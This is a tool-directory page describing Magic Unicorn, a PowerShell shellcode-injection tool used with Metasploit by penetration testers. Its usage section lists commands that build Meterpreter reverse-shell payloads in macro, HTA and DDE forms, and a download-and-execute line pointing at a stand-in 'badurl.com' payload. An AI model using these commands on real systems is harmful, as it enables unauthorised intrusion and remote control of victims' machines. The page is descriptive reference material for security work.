Magic Unicorn


Tool and Usage

Project details

License
Custom license
Programming language
Python
Author
David Kennedy
Latest release
3.17
Latest release date

Project health

60
This score is calculated by different factors, like project age, last release date, etc.

Why this tool?

Magic Unicorn is a tool to perform a PowerShell downgrade attack and inject shellcode into memory.

How it works

The tool is used together with Metasploit. With Magic Unicorn located in the right path, execute the tool. Upon execution, it generates a PowerShell command that can be pasted into a command-line window. Another option is to use a payload delivery system from within Metasploit.

Background information

Magic Unicorn is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy and Josh Kelly at DEF CON 18.

Usage and audience

Magic Unicorn is commonly used for penetration testing or shellcode injection. Target users for this tool are pentesters and security professionals.

Features

  • Command line interface

Example usage and output

-------------------- Magic Unicorn Attack Vector -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

Tool review and remarks

The review and analysis of this project resulted in the following remarks for this security tool:

Strengths

  • + More than 1000 GitHub stars
  • + Many releases available
  • + The source code of this software is available

History and highlights

  • Demo at DEF CON 26 Demo Labs

Author and Maintainers

Magic Unicorn is under development by David Kennedy.

Installation

Supported operating systems

Magic Unicorn is known to work on Linux.


Related tool information

Categories

This tool is categorized as a PowerShell exploitation tool.
